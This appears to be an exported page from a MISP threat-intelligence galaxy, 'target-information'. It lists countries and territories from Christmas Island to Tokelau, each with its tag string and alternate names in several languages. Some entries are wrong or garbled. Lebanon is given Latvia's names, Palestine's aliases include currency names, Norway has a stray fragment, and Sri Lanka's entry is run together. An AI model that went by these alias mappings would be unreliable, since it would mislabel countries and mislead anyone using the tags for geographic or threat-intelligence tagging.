Christmas Island

The tag is: misp-galaxy:target-information="Christmas Island"

Christmas Island is also known as:

  • Territory of Christmas Island

Cocos Islands

The tag is: misp-galaxy:target-information="Cocos Islands"

Cocos Islands is also known as:

  • Cocos (Keeling) Islands

  • Territory of Cocos (Keeling) Islands

  • Pulu Kokos (Keeling)

  • Wilayah Kepulauan Cocos (Keeling)

Colombia

The tag is: misp-galaxy:target-information="Colombia"

Colombia is also known as:

  • Republic of Colombia

  • República de Colombia

Comoros

The tag is: misp-galaxy:target-information="Comoros"

Comoros is also known as:

  • جزر القمر

  • Juzur al-Qumur/Qamar

  • Union of the Comoros

  • الاتحاد القمري

  • al-Ittiḥād al-Qumurī/Qamarī

  • Union des Comores

  • Umoja wa Komori

Cook Islands

The tag is: misp-galaxy:target-information="Cook Islands"

Cook Islands is also known as:

  • Kūki 'Āirani

Costa Rica

The tag is: misp-galaxy:target-information="Costa Rica"

Costa Rica is also known as:

  • Republic of Costa Rica

  • República de Costa Rica

Croatia

The tag is: misp-galaxy:target-information="Croatia"

Croatia is also known as:

  • Hrvatska

  • Republic of Croatia

  • Republika Hrvatska

Cuba

The tag is: misp-galaxy:target-information="Cuba"

Cuba is also known as:

  • Republic of Cuba

  • República de Cuba

Curaçao

The tag is: misp-galaxy:target-information="Curaçao"

Curaçao is also known as:

  • Curacao

Cyprus

The tag is: misp-galaxy:target-information="Cyprus"

Cyprus is also known as:

  • Κύπρος

  • Kıbrıs

  • Republic of Cyprus

  • Κυπριακή Δημοκρατία

  • Cypriot Republic

  • Kıbrıs Cumhuriyeti

Czech Republic

The tag is: misp-galaxy:target-information="Czech Republic"

Czech Republic is also known as:

  • Česká republika

  • Czechia

  • Česko

Democratic Republic of the Congo

The tag is: misp-galaxy:target-information="Democratic Republic of the Congo"

Democratic Republic of the Congo is also known as:

  • DR Congo

  • DRC

  • DROC

  • Congo-Kinshasa

  • Congo

  • République démocratique du Congo

  • Repubilika ya Kôngo ya Dimokalasi

  • Republíki ya Kongó Demokratíki

  • Jamhuri ya Kidemokrasia ya Kongo

  • Ditunga dia Kongu wa Mungalaata

Denmark

The tag is: misp-galaxy:target-information="Denmark"

Denmark is also known as:

  • Danmark

  • Kingdom of Denmark

  • Kongeriget Danmark

Djibouti

The tag is: misp-galaxy:target-information="Djibouti"

Djibouti is also known as:

  • Yibuuti

  • جيبوتي

  • Jabuuti

  • Republic of Djibouti

  • République de Djibouti

  • جمهورية جيبوتي

  • Jamhuuriyadda Jabuuti

  • Gabuutih Ummuuno

Dominica

The tag is: misp-galaxy:target-information="Dominica"

Dominica is also known as:

  • Wai‘tu kubuli

  • Commonwealth of Dominica

Dominican Republic

The tag is: misp-galaxy:target-information="Dominican Republic"

Dominican Republic is also known as:

  • República Dominicana

East Timor

The tag is: misp-galaxy:target-information="East Timor"

East Timor is also known as:

  • Timor-Leste

  • Timór Lorosa’e

  • Democratic Republic of Timor-Leste

  • Repúblika Demokrátika Timór-Leste

  • República Democrática de Timor-Leste

Ecuador

The tag is: misp-galaxy:target-information="Ecuador"

Ecuador is also known as:

  • Ikwayur

  • Ecuador

  • Ekuatur

  • Republic of Ecuador

  • República del Ecuador

  • Ikwayur Runaq Imayka

  • Ekuatur Nunka

  • Ikwadur Ripuwlika

Egypt

The tag is: misp-galaxy:target-information="Egypt"

Egypt is also known as:

  • مِصر‎

  • مَصر‎

  • Ⲭⲏⲙⲓ

  • Arab Republic of Egypt

  • جمهورية مصر العربية

El Salvador

The tag is: misp-galaxy:target-information="El Salvador"

El Salvador is also known as:

  • Republic of El Salvador

  • República de El Salvador

Equatorial Guinea

The tag is: misp-galaxy:target-information="Equatorial Guinea"

Equatorial Guinea is also known as:

  • Guinea Ecuatorial

  • Guinée équatoriale

  • Guiné Equatorial

  • Republic of Equatorial Guinea

  • República de Guinea Ecuatorial

  • République de Guinée équatoriale

  • República da Guiné Equatorial

Eritrea

The tag is: misp-galaxy:target-information="Eritrea"

Eritrea is also known as:

  • ኤርትራ

  • State of Eritrea

Estonia

The tag is: misp-galaxy:target-information="Estonia"

Estonia is also known as:

  • Eesti

  • Republic of Estonia

  • Eesti Vabariik

Ethiopia

The tag is: misp-galaxy:target-information="Ethiopia"

Ethiopia is also known as:

  • ኢትዮጵያ

  • Itoophiyaa

  • Itoobiya

  • Federal Democratic Republic of Ethiopia

  • የኢትዮጵያ ፌዴራላዊ ዴሞክራሲያዊ ሪፐብሊክ

  • ityoppiah federalih demokrasih ummuno

  • Rippabliikii Federaalawaa Dimokraatawaa Itiyoophiyaa

  • Jamhuuriyadda Dimuqraadiga Federaalka Itoobiya

Falkland Islands

The tag is: misp-galaxy:target-information="Falkland Islands"

Falkland Islands is also known as:

  • Islas Malvinas

Faroe Islands

The tag is: misp-galaxy:target-information="Faroe Islands"

Faroe Islands is also known as:

  • Føroyar

  • Færøerne

  • Faeroe Islands

Fiji

The tag is: misp-galaxy:target-information="Fiji"

Fiji is also known as:

  • Viti

  • फ़िजी

  • Republic of Fiji

  • Matanitu Tugalala o Viti

  • फ़िजी गणराज्य

Finland

The tag is: misp-galaxy:target-information="Finland"

Finland is also known as:

  • Suomi

  • Republic of Finland

  • Suomen tasavalta

  • Republiken Finland

France

The tag is: misp-galaxy:target-information="France"

France is also known as:

  • French Republic

  • République française

French Polynesia

The tag is: misp-galaxy:target-information="French Polynesia"

French Polynesia is also known as:

  • Polynésie française

  • Pōrīnetia Farāni

Gabon

The tag is: misp-galaxy:target-information="Gabon"

Gabon is also known as:

  • Gabonese Republic

  • République gabonaise

Gambia

The tag is: misp-galaxy:target-information="Gambia"

Gambia is also known as:

  • The Gambia

  • Republic of The Gambia

Georgia

The tag is: misp-galaxy:target-information="Georgia"

Georgia is also known as:

  • საქართველო

  • sakartvelo

  • Republic of Georgia

  • საქართველოს რესპუბლიკა

  • sakartvelos resp’ublik’a

Germany

The tag is: misp-galaxy:target-information="Germany"

Germany is also known as:

  • Deutschland

  • Federal Republic of Germany

  • Bundesrepublik Deutschland

Ghana

The tag is: misp-galaxy:target-information="Ghana"

Ghana is also known as:

  • Republic of Ghana

Gibraltar

The tag is: misp-galaxy:target-information="Gibraltar"

Gibraltar is also known as:

  • جبل طارق

  • Jabal Ṭāriq

Greece

The tag is: misp-galaxy:target-information="Greece"

Greece is also known as:

  • Hellas

  • Ελλάς

  • Hellenic Republic

  • Ελληνική Δημοκρατία

  • Ellinikí Dimokratía

Greenland

The tag is: misp-galaxy:target-information="Greenland"

Greenland is also known as:

  • Kalaallit Nunaat

  • Grønland

Grenada

The tag is: misp-galaxy:target-information="Grenada"

Guam

The tag is: misp-galaxy:target-information="Guam"

Guam is also known as:

  • Guåhån

  • Territory of Guam

Guatemala

The tag is: misp-galaxy:target-information="Guatemala"

Guatemala is also known as:

  • Republic of Guatemala

  • República de Guatemala

Guernsey

The tag is: misp-galaxy:target-information="Guernsey"

Guernsey is also known as:

  • Guernési

Guinea

The tag is: misp-galaxy:target-information="Guinea"

Guinea is also known as:

  • Ginee

  • Guinée

  • Republic of Guinea

  • Renndaandi Ginee

  • République de Guinée (French)

Guinea-Bissau

The tag is: misp-galaxy:target-information="Guinea-Bissau"

Guinea-Bissau is also known as:

  • Guiné-Bissau

  • Republic of Guinea-Bissau

  • República da Guiné-Bissau

Guyana

The tag is: misp-galaxy:target-information="Guyana"

Guyana is also known as:

  • Co-operative Republic of Guyana

Haiti

The tag is: misp-galaxy:target-information="Haiti"

Haiti is also known as:

  • Haïti

  • Ayiti

  • Republic of Haiti

  • République d’Haïti

  • Repiblik Ayiti

  • Hayti

Honduras

The tag is: misp-galaxy:target-information="Honduras"

Honduras is also known as:

  • Republic of Honduras

  • República de Honduras

Hong Kong

The tag is: misp-galaxy:target-information="Hong Kong"

Hong Kong is also known as:

  • Hong Kong Special Administrative Region of the People’s Republic of China

Hungary

The tag is: misp-galaxy:target-information="Hungary"

Hungary is also known as:

  • Magyarország

Iceland

The tag is: misp-galaxy:target-information="Iceland"

Iceland is also known as:

  • Ísland

India

The tag is: misp-galaxy:target-information="India"

India is also known as:

  • Republic of India

  • Bhārat Gaṇarājya

Indonesia

The tag is: misp-galaxy:target-information="Indonesia"

Indonesia is also known as:

  • Republic of Indonesia

  • Republik Indonesia

Iran

The tag is: misp-galaxy:target-information="Iran"

Iran is also known as:

  • Persia

  • Islamic Republic of Iran

  • جمهوری اسلامی ایران

  • Jomhuri-ye Eslāmi-ye Irān

Iraq

The tag is: misp-galaxy:target-information="Iraq"

Iraq is also known as:

  • العراق

  • al-'Irāq

  • عێراق‎

  • Êraq

  • Republic of Iraq

  • جمهورية العراق

  • کۆماری عێراق

  • کۆمارا ئێـراقێ

  • Jumhūrīyyat al-'Irāq

  • Komarî Êraq

Ireland

The tag is: misp-galaxy:target-information="Ireland"

Ireland is also known as:

  • Éire

  • Republic of Ireland

Isle of Man

The tag is: misp-galaxy:target-information="Isle of Man"

Isle of Man is also known as:

  • Mannin

  • Ellan Vannin

  • Mann

Israel

The tag is: misp-galaxy:target-information="Israel"

Israel is also known as:

  • יִשְׂרָאֵל

  • إِسْرَائِيل‎

  • State of Israel

Italy

The tag is: misp-galaxy:target-information="Italy"

Italy is also known as:

  • Italia

  • Italian Republic

  • Repubblica Italiana

Ivory Coast

The tag is: misp-galaxy:target-information="Ivory Coast"

Ivory Coast is also known as:

  • Côte d’Ivoire

  • Republic of Côte d’Ivoire

  • République de Côte d’Ivoire

Jamaica

The tag is: misp-galaxy:target-information="Jamaica"

Japan

The tag is: misp-galaxy:target-information="Japan"

Japan is also known as:

  • 日本

  • Nippon

  • Nihon

  • Nippon-koku

  • Nihon-koku

  • State of Japan

Jersey

The tag is: misp-galaxy:target-information="Jersey"

Jersey is also known as:

  • Jèrri

  • Bailiwick of Jersey

  • Bailliage de Jersey

  • Bailliage dé Jèrri

Jordan

The tag is: misp-galaxy:target-information="Jordan"

Jordan is also known as:

  • الْأُرْدُنّ‎

  • Al-ʾUrdunn

  • Hashemite Kingdom of Jordan

  • المملكة الأردنية الهاشمية

  • Al-Mamlakah Al-Urdunnīyah Al-Hāshimīyah

Kazakhstan

The tag is: misp-galaxy:target-information="Kazakhstan"

Kazakhstan is also known as:

  • Қазақстан

  • Qazaqstan

  • Казахстан

  • Kazakhstan

  • Republic of Kazakhstan

  • Қазақстан Республикасы

  • Qazaqstan Respýblıkasy

  • Республика Казахстан

  • Respublika Kazakhstan

Kenya

The tag is: misp-galaxy:target-information="Kenya"

Kenya is also known as:

  • Republic of Kenya

  • amhuri ya Kenya

Kiribati

The tag is: misp-galaxy:target-information="Kiribati"

Kiribati is also known as:

  • Republic of Kiribati

  • Ribaberiki Kiribati

Kosovo

The tag is: misp-galaxy:target-information="Kosovo"

Kosovo is also known as:

  • Kosova

  • Kosovë

  • Косово

  • Republic of Kosovo

  • Republika e Kosovës

  • Република Косово

  • Republika Kosovo

Kuwait

The tag is: misp-galaxy:target-information="Kuwait"

Kuwait is also known as:

  • الكويت‎

  • al-Kuwait

  • State of Kuwait

  • دولة الكويت

  • Dawlat al-Kuwait

Kyrgyzstan

The tag is: misp-galaxy:target-information="Kyrgyzstan"

Kyrgyzstan is also known as:

  • Кыргызстан

  • Kırğızstan

  • Kyrgyz

  • Kyrgyz Republic

  • Кыргыз Республикасы

  • Kırğız Respublikası

  • Кыргызская Республика

  • Kyrgyzskaya Respublika

  • Kirghizia

  • Киргизия

Laos

The tag is: misp-galaxy:target-information="Laos"

Laos is also known as:

  • Lāo

  • ລາວ

  • Lao People’s Democratic Republic

  • ສາທາລະນະລັດ ປະຊາທິປະໄຕ ປະຊາຊົນລາວ

  • Sathalanalat Paxathipatai Paxaxon Lao

  • République démocratique populaire lao

  • Muang Lao

  • ເມືອງລາວ

Latvia

The tag is: misp-galaxy:target-information="Latvia"

Latvia is also known as:

  • Latvija

  • Lețmō

  • Republic of Latvia

  • Latvijas Republika

  • Lețmō Vabām

Lebanon

The tag is: misp-galaxy:target-information="Lebanon"

Lebanon is also known as:

  • Latvija

  • Lețmō

  • Republic of Latvia

  • Latvijas Republika

  • Lețmō Vabāmō

Lesotho

The tag is: misp-galaxy:target-information="Lesotho"

Lesotho is also known as:

  • Kingdom of Lesotho

  • 'Muso oa Lesotho

Liberia

The tag is: misp-galaxy:target-information="Liberia"

Liberia is also known as:

  • Republic of Liberia

Libya

The tag is: misp-galaxy:target-information="Libya"

Libya is also known as:

  • ليبيا‎

  • Lībiyā

  • State of Libya

  • دولة ليبيا

Liechtenstein

The tag is: misp-galaxy:target-information="Liechtenstein"

Liechtenstein is also known as:

  • Principality of Liechtenstein

  • Fürstentum Liechtenstein

Lithuania

The tag is: misp-galaxy:target-information="Lithuania"

Lithuania is also known as:

  • Lietuva

  • Republic of Lithuania

  • Lietuvos Respublika

Macau

The tag is: misp-galaxy:target-information="Macau"

Macau is also known as:

  • Macao

  • 澳門

  • Macao Special Administrative Region of the People’s Republic of China

  • 中華人民共和國澳門特別行政區

  • Jūng’wàh Yàhnmàhn Guhng’wòhgwok Oumún Dahkbiht Hàhngjingkēui

  • Região Administrativa Especial de Macau da República Popular da China

North Macedonia

The tag is: misp-galaxy:target-information="North Macedonia"

North Macedonia is also known as:

  • Republic of North Macedonia

  • Република Северна Македонија

  • Republika e Maqedonisë së Veriut

Madagascar

The tag is: misp-galaxy:target-information="Madagascar"

Madagascar is also known as:

  • Madagasikara

  • Republic of Madagascar

  • Repoblikan’i Madagasikara

  • République de Madagascar

  • Malagasy Republic

Malawi

The tag is: misp-galaxy:target-information="Malawi"

Malawi is also known as:

  • Republic of Malawi

  • Dziko la Malaŵi

  • Charu cha Malaŵi

Malaysia

The tag is: misp-galaxy:target-information="Malaysia"

Maldives

The tag is: misp-galaxy:target-information="Maldives"

Maldives is also known as:

  • ދިވެހިރާއްޖެ

  • Dhivehi Raajje

  • Republic of Maldives

  • ދިވެހިރާއްޖޭގެ ޖުމްހޫރިއްޔާ

  • Dhivehi Raajjeyge Jumhooriyyaa

Mali

The tag is: misp-galaxy:target-information="Mali"

Mali is also known as:

  • Republic of Mali

  • Renndaandi Maali

  • République du Mali

  • Mali ka Fasojamana

Malta

The tag is: misp-galaxy:target-information="Malta"

Malta is also known as:

  • Republic of Malta

  • Repubblika ta' Malta

Marshall Islands

The tag is: misp-galaxy:target-information="Marshall Islands"

Marshall Islands is also known as:

  • Republic of the Marshall Islands

  • Aolepān Aorōkin M̧ajeļ

Mauritania

The tag is: misp-galaxy:target-information="Mauritania"

Mauritania is also known as:

  • موريتانيا‎

  • Mūrītānyā

  • Mauritanie

  • Islamic Republic of Mauritania

  • الجمهورية الإسلامية الموريتانية

  • al-Jumhūrīyah al-Islāmīyah al-Mūrītānīyah

  • République islamique de Mauritanie

Mauritius

The tag is: misp-galaxy:target-information="Mauritius"

Mauritius is also known as:

  • Maurice

  • Moris

  • Republic of Mauritius

  • République de Maurice

  • Repiblik Moris

Mayotte

The tag is: misp-galaxy:target-information="Mayotte"

Mayotte is also known as:

  • Maore

  • Mahori

  • Department of Mayotte

  • Département de Mayotte

Mexico

The tag is: misp-galaxy:target-information="Mexico"

Mexico is also known as:

  • México

  • Mēxihco

  • United Mexican States

  • Estados Unidos Mexicanos

Micronesia

The tag is: misp-galaxy:target-information="Micronesia"

Micronesia is also known as:

  • FSM

  • Federated States of Micronesia

Moldova

The tag is: misp-galaxy:target-information="Moldova"

Moldova is also known as:

  • Republic of Moldova

  • Republica Moldova

Monaco

The tag is: misp-galaxy:target-information="Monaco"

Monaco is also known as:

  • Principality of Monaco

  • Principauté de Monaco

  • Principatu de Mùnegu

Mongolia

The tag is: misp-galaxy:target-information="Mongolia"

Mongolia is also known as:

  • Монгол Улс

  • Mongol Uls

Montenegro

The tag is: misp-galaxy:target-information="Montenegro"

Montenegro is also known as:

  • Црна Гора

  • Crna Gora

Montserrat

The tag is: misp-galaxy:target-information="Montserrat"

Morocco

The tag is: misp-galaxy:target-information="Morocco"

Morocco is also known as:

  • المغرب‎

  • al-maġhrib

  • ⵍⵎⵖⵔⵉⴱ

  • lmeɣrib

  • Maroc

  • Kingdom of Morocco

  • المملكة المغربية

  • al-mamlakah al-maghribiyah

  • ⵜⴰⴳⵍⴷⵉⵜ ⵏ ⵍⵎⵖⵔⵉⴱ

  • tageldit n lmaɣrib

  • Royaume du Maroc

Mozambique

The tag is: misp-galaxy:target-information="Mozambique"

Mozambique is also known as:

  • Republic of Mozambique

  • Moçambique

  • Mozambiki

  • Msumbiji

  • Muzambhiki

  • República de Moçambique

  • Dziko la Mozambiki

  • Jamhuri ya Msumbiji

Myanmar

The tag is: misp-galaxy:target-information="Myanmar"

Myanmar is also known as:

  • မြန်မာ

  • Burma

  • Republic of the Union of Myanmar

  • ပြည်ထောင်စု သမ္မတ မြန်မာနိုင်ငံတော်‌

  • Pyidaunzu Thanmăda Myăma Nainngandaw

Namibia

The tag is: misp-galaxy:target-information="Namibia"

Namibia is also known as:

  • Republic of Namibia

  • Republiek van Namibië

  • Republik Namibia

  • Namibiab Republiki dib

  • Republika yaNamibia

  • Orepublika yaNamibia

  • Republika zaNamibia

  • Rephaboliki ya Namibia

  • Namibia ye Lukuluhile

Nauru

The tag is: misp-galaxy:target-information="Nauru"

Nauru is also known as:

  • Naoero

  • Republic of Nauru

  • Repubrikin Naoero

  • Pleasant Island

Nepal

The tag is: misp-galaxy:target-information="Nepal"

Nepal is also known as:

  • नेपाल

  • Federal Democratic Republic of Nepal

  • सङ्घीय लोकतान्त्रिक गणतन्त्र नेपाल

  • Saṅghīya Lokatāntrik Gaṇatantra Nepāl

Netherlands

The tag is: misp-galaxy:target-information="Netherlands"

Netherlands is also known as:

  • Nederland

  • Holland

Netherlands Antilles

The tag is: misp-galaxy:target-information="Netherlands Antilles"

Netherlands Antilles is also known as:

  • Nederlandse Antillen

  • Antia Hulandes

New Caledonia

The tag is: misp-galaxy:target-information="New Caledonia"

New Caledonia is also known as:

  • Nouvelle-Calédonie

New Zealand

The tag is: misp-galaxy:target-information="New Zealand"

New Zealand is also known as:

  • Aotearoa

Nicaragua

The tag is: misp-galaxy:target-information="Nicaragua"

Nicaragua is also known as:

  • Republic of Nicaragua

  • República de Nicaragua

Niger

The tag is: misp-galaxy:target-information="Niger"

Niger is also known as:

  • The Niger

  • Republic of the Niger

  • République du Niger

Nigeria

The tag is: misp-galaxy:target-information="Nigeria"

Nigeria is also known as:

  • Federal Republic of Nigeria

  • Jamhuriyar Taraiyar Nijeriya

  • Ọ̀hàńjíkọ̀ Ọ̀hànézè Naìjíríyà

  • Orílẹ̀-èdè Olómìniira Àpapọ̀ Nàìjíríà

Niue

The tag is: misp-galaxy:target-information="Niue"

Niue is also known as:

  • Niuē

North Korea

The tag is: misp-galaxy:target-information="North Korea"

North Korea is also known as:

  • 조선

  • Chosŏ

  • 북조선

  • Pukchosŏn

  • Democratic People’s Republic of Korea

  • DPRK

  • DPR Korea

  • 조선민주주의인민공화국

  • Chosŏn Minjujuŭi Inmin Konghwaguk

Northern Mariana Islands

The tag is: misp-galaxy:target-information="Northern Mariana Islands"

Northern Mariana Islands is also known as:

  • Commonwealth of the Northern Mariana Islands

  • Sankattan Siha Na Islas Mariånas

  • Commonwealth Téél Falúw kka Efáng llól Marianas

Norway

The tag is: misp-galaxy:target-information="Norway"

Norway is also known as:

  • Norge

  • Noreg

  • Norga

  • Nöörje

  • Vuodna),

  • Kingdom of Norway

  • Kongeriket Norge

  • Kongeriket Noreg

  • Norgga gonagasriika

  • Nøørjen gånkarijhke

  • Vuona gånågisrijkka

Oman

The tag is: misp-galaxy:target-information="Oman"

Oman is also known as:

  • عمان‎

  • ʻumān

  • Sultanate of Oman

  • سلطنة عُمان

  • Salṭanat ʻUmān

Pakistan

The tag is: misp-galaxy:target-information="Pakistan"

Pakistan is also known as:

  • Islamic Republic of Pakistan

  • اِسلامی جمہوریہ پاكِستان

  • Islāmī Jumhūriyah Pākistān

Palau

The tag is: misp-galaxy:target-information="Palau"

Palau is also known as:

  • Belau

  • Palaos

  • Pelew

  • Republic of Palau

  • Beluu er a Belau

  • パラオ共和国

Palestine

The tag is: misp-galaxy:target-information="Palestine"

Palestine is also known as:

  • فلسطين‎

  • Filasṭīn

  • State of Palestine

  • دولة فلسطين

  • Dawlat Filasṭīn

  • Palestine pound

  • جنيه فلسطيني

  • פונט פלשתינאי א״י

Panama

The tag is: misp-galaxy:target-information="Panama"

Panama is also known as:

  • Panamá

  • Republic of Panama

  • República de Panamá

Papua New Guinea

The tag is: misp-galaxy:target-information="Papua New Guinea"

Papua New Guinea is also known as:

  • Papua Niugini

  • Papua Niu Gini

  • Independent State of Papua New Guinea

  • Independen Stet bilong Papua Niugini

  • Independen Stet bilong Papua Niu Gini

Paraguay

The tag is: misp-galaxy:target-information="Paraguay"

Paraguay is also known as:

  • Paraguái

  • Republic of Paraguay

  • República del Paraguay

  • Tetã Paraguái

Peru

The tag is: misp-galaxy:target-information="Peru"

Peru is also known as:

  • Perú

  • Piruw Republika

  • Piruw Suyu

  • Republic of Peru

  • República del Perú

Philippines

The tag is: misp-galaxy:target-information="Philippines"

Philippines is also known as:

  • Pilipinas

  • Filipinas

  • Republic of the Philippines

  • Republika ng Pilipinas

Pitcairn

The tag is: misp-galaxy:target-information="Pitcairn"

Pitcairn is also known as:

  • Pitkern Ailen

  • Pitcairn, Henderson, Ducie and Oeno Islands

  • Pitcairn Islands

Poland

The tag is: misp-galaxy:target-information="Poland"

Poland is also known as:

  • Polska

  • Republic of Poland

  • Rzeczpospolita Polska

Portugal

The tag is: misp-galaxy:target-information="Portugal"

Portugal is also known as:

  • Portuguese Republic

  • República Portuguesa

Puerto Rico

The tag is: misp-galaxy:target-information="Puerto Rico"

Puerto Rico is also known as:

  • Puerto Rico

  • Porto Rico

Qatar

The tag is: misp-galaxy:target-information="Qatar"

Qatar is also known as:

  • قطر

  • Qaṭar

  • State of Qatar

  • دولة قطر

Republic of the Congo

The tag is: misp-galaxy:target-information="Republic of the Congo"

Republic of the Congo is also known as:

  • République du Congo

  • Repubilika ya Kôngo

  • Republíki ya Kongó

  • Congo-Brazzaville

  • Congo Republic

  • RotC

  • Congo

Reunion

The tag is: misp-galaxy:target-information="Reunion"

Reunion is also known as:

  • La Réunion

  • Île Bourbon

Romania

The tag is: misp-galaxy:target-information="Romania"

Romania is also known as:

  • România

Russia

The tag is: misp-galaxy:target-information="Russia"

Russia is also known as:

  • Росси́я

  • Rossiya

  • Russian Federation

  • Российская Федерация

  • Rossiyskaya Federatsiya

Rwanda

The tag is: misp-galaxy:target-information="Rwanda"

Rwanda is also known as:

  • u Rwanda

  • Republic of Rwanda

  • Repubulika y’u Rwanda

  • République du Rwanda

  • Jamhuri ya Rwanda

Saint Barthelemy

The tag is: misp-galaxy:target-information="Saint Barthelemy"

Saint Barthelemy is also known as:

  • Saint-Barthélemy

  • Territorial Collectivity of Saint-Barthélemy

  • Collectivité territoriale de Saint-Barthélemy

  • Collectivity of Saint-Barthélemy

  • Collectivité de Saint-Barthélemy

Saint Helena

The tag is: misp-galaxy:target-information="Saint Helena"

Saint Helena is also known as:

  • Saint Helena, Ascension and Tristan da Cunha

Saint Kitts and Nevis

The tag is: misp-galaxy:target-information="Saint Kitts and Nevis"

Saint Kitts and Nevis is also known as:

  • Federation of Saint Christopher and Nevis

Saint Lucia

The tag is: misp-galaxy:target-information="Saint Lucia"

Saint Lucia is also known as:

  • Sainte-Lucie

Saint Martin

The tag is: misp-galaxy:target-information="Saint Martin"

Saint Martin is also known as:

  • Saint-Martin

  • Collectivity of Saint Martin

  • Collectivité de Saint-Martin

Saint Pierre and Miquelon

The tag is: misp-galaxy:target-information="Saint Pierre and Miquelon"

Saint Pierre and Miquelon is also known as:

  • Saint-Pierre-et-Miquelon

  • Overseas Collectivity of Saint Pierre and Miquelon

  • Collectivité d’outre-mer de Saint-Pierre-et-Miquelon

Saint Vincent and the Grenadines

The tag is: misp-galaxy:target-information="Saint Vincent and the Grenadines"

Samoa

The tag is: misp-galaxy:target-information="Samoa"

Samoa is also known as:

  • Independent State of Samoa

  • Malo Saʻoloto Tutoʻatasi o Sāmoa

  • Western Samoa

San Marino

The tag is: misp-galaxy:target-information="San Marino"

San Marino is also known as:

  • Republic of San Marino

  • Repubblica di San Marino

  • Most Serene Republic of San Marino

  • Serenissima Repubblica di San Marino

Sao Tome and Principe

The tag is: misp-galaxy:target-information="Sao Tome and Principe"

Sao Tome and Principe is also known as:

  • Democratic Republic of São Tomé and Príncipe

  • República Democrática de São Tomé e Príncipe

Saudi Arabia

The tag is: misp-galaxy:target-information="Saudi Arabia"

Saudi Arabia is also known as:

  • Kingdom of Saudi Arabia

  • المملكة العربية السعودية

  • al-Mamlakah al-ʿArabīyah as-Saʿūdīyah

Senegal

The tag is: misp-galaxy:target-information="Senegal"

Senegal is also known as:

  • Sénégal

  • Republic of Senegal

  • Réewum Senegaal

  • Renndaandi Senegal

  • République du Sénégal

Serbia

The tag is: misp-galaxy:target-information="Serbia"

Serbia is also known as:

  • Србија

  • Srbija

  • Republic of Serbia

  • Република Србија

  • Republika Srbija

Seychelles

The tag is: misp-galaxy:target-information="Seychelles"

Seychelles is also known as:

  • Republic of Seychelles

  • République des Seychelles

  • Repiblik Sesel

Sierra Leone

The tag is: misp-galaxy:target-information="Sierra Leone"

Sierra Leone is also known as:

  • Republic of Sierra Leone

  • Salone

Singapore

The tag is: misp-galaxy:target-information="Singapore"

Singapore is also known as:

  • Republic of Singapore

Sint Maarten

The tag is: misp-galaxy:target-information="Sint Maarten"

Slovakia

The tag is: misp-galaxy:target-information="Slovakia"

Slovakia is also known as:

  • Slovensko

  • Slovak Republic

  • Slovenská republika

Slovenia

The tag is: misp-galaxy:target-information="Slovenia"

Slovenia is also known as:

  • Slovenija

  • Republic of Slovenia

  • Republika Slovenija

Solomon Islands

The tag is: misp-galaxy:target-information="Solomon Islands"

Somalia

The tag is: misp-galaxy:target-information="Somalia"

Somalia is also known as:

  • Soomaaliya

  • الصومال‎

  • aṣ-Ṣūmāl

  • Federal Republic of Somalia

  • Jamhuuriyadda Federaalka Soomaaliya

  • جمهورية الصومال الاتحادية

  • Jumhūrīyat aṣ-Ṣūmāl al-Fīdirālīyah

South Africa

The tag is: misp-galaxy:target-information="South Africa"

South Africa is also known as:

  • Republic of South Africa

  • RSA

  • iRiphabhuliki yaseNingizimu Afrika

  • iRiphabliki yomZantsi Afrika

  • Republiek van Suid-Afrika

  • Repabliki ya Afrika-Borwa

  • Rephaboliki ya Aforika Borwa

  • Rephaboliki ya Afrika Borwa

  • Riphabliki ya Afrika Dzonga

  • iRiphabhulikhi yeNingizimu Afrika

  • Riphabuḽiki ya Afurika Tshipembe

  • iRipha bliki yeSewula Afrika

South Korea

The tag is: misp-galaxy:target-information="South Korea"

South Korea is also known as:

  • Republic of Korea

  • 대한민국

  • Daehan Minguk

South Sudan

The tag is: misp-galaxy:target-information="South Sudan"

South Sudan is also known as:

  • Republic of South Sudan

Spain

The tag is: misp-galaxy:target-information="Spain"

Spain is also known as:

  • Kingdom of Spain

  • Reino de España

  • Regne d’Espanya

  • Espainiako Erresuma

  • Reiaume d’Espanha

Sri Lanka

The tag is: misp-galaxy:target-information="Sri Lanka"

Sri Lanka is also known as:

  • ශ්‍රී ලංකාŚrī Laṃkā; Tamil: இலங்கை

  • Ilaṅkai

  • Democratic Socialist Republic of Sri Lanka

  • ශ්‍රී ලංකා ප්‍රජාතාන්ත්‍රික සමාජවාදී ජනරජ,ය

  • Srī Lankā prajātāntrika samājavādī janarajaya

  • இலங்கை ஜனநாயக சோசலிச குடியரசு

  • Ilaṅkai jaṉanāyaka sōsalisa kuṭiyarasu

Sudan

The tag is: misp-galaxy:target-information="Sudan"

Sudan is also known as:

  • السودان‎

  • as-Sūdān

  • Republic of the Sudan

  • جمهورية السودان

  • Jumhūriyyat as-Sūdān

Suriname

The tag is: misp-galaxy:target-information="Suriname"

Suriname is also known as:

  • Surinam

  • Republic of Suriname

  • Republiek Suriname

Svalbard and Jan Mayen

The tag is: misp-galaxy:target-information="Svalbard and Jan Mayen"

Svalbard and Jan Mayen is also known as:

  • Svalbard og Jan Mayen

Swaziland

The tag is: misp-galaxy:target-information="Swaziland"

Swaziland is also known as:

  • Eswatini

  • eSwatini

  • Kingdom of eSwatini

  • Umbuso weSwatini

Sweden

The tag is: misp-galaxy:target-information="Sweden"

Sweden is also known as:

  • Sverige

  • Kingdom of Sweden

  • Konungariket Sverige

Switzerland

The tag is: misp-galaxy:target-information="Switzerland"

Switzerland is also known as:

  • Swiss Confederation

  • Schweizerische Eidgenossenschaft

  • Confédération suisse

  • Confederazione Svizzera

  • Confederaziun svizra

  • Confoederatio Helvetica

Syria

The tag is: misp-galaxy:target-information="Syria"

Syria is also known as:

  • سوريا‎

  • Sūriyā

  • Syrian Arab Republic

  • الجمهورية العربية السورية

  • al-Jumhūrīyah al-ʻArabīyah as-Sūrīyah

Taiwan

The tag is: misp-galaxy:target-information="Taiwan"

Taiwan is also known as:

  • Republic of China

  • ROC

  • 中華民國

Tajikistan

The tag is: misp-galaxy:target-information="Tajikistan"

Tajikistan is also known as:

  • Тоҷикистон

  • Republic of Tajikistan

  • Ҷумҳурии Тоҷикистон

  • Jumhurii Tojikiston

Tanzania

The tag is: misp-galaxy:target-information="Tanzania"

Tanzania is also known as:

  • United Republic of Tanzania

  • Jamhuri ya Muungano wa Tanzania

Thailand

The tag is: misp-galaxy:target-information="Thailand"

Thailand is also known as:

  • Siam

  • Kingdom of Thailand

  • ราชอาณาจักรไทย

  • Ratcha-anachak Thai

Togo

The tag is: misp-galaxy:target-information="Togo"

Togo is also known as:

  • Togolese Republic

  • République togolaise

Tokelau

The tag is: misp-galaxy:target-information="Tokelau"

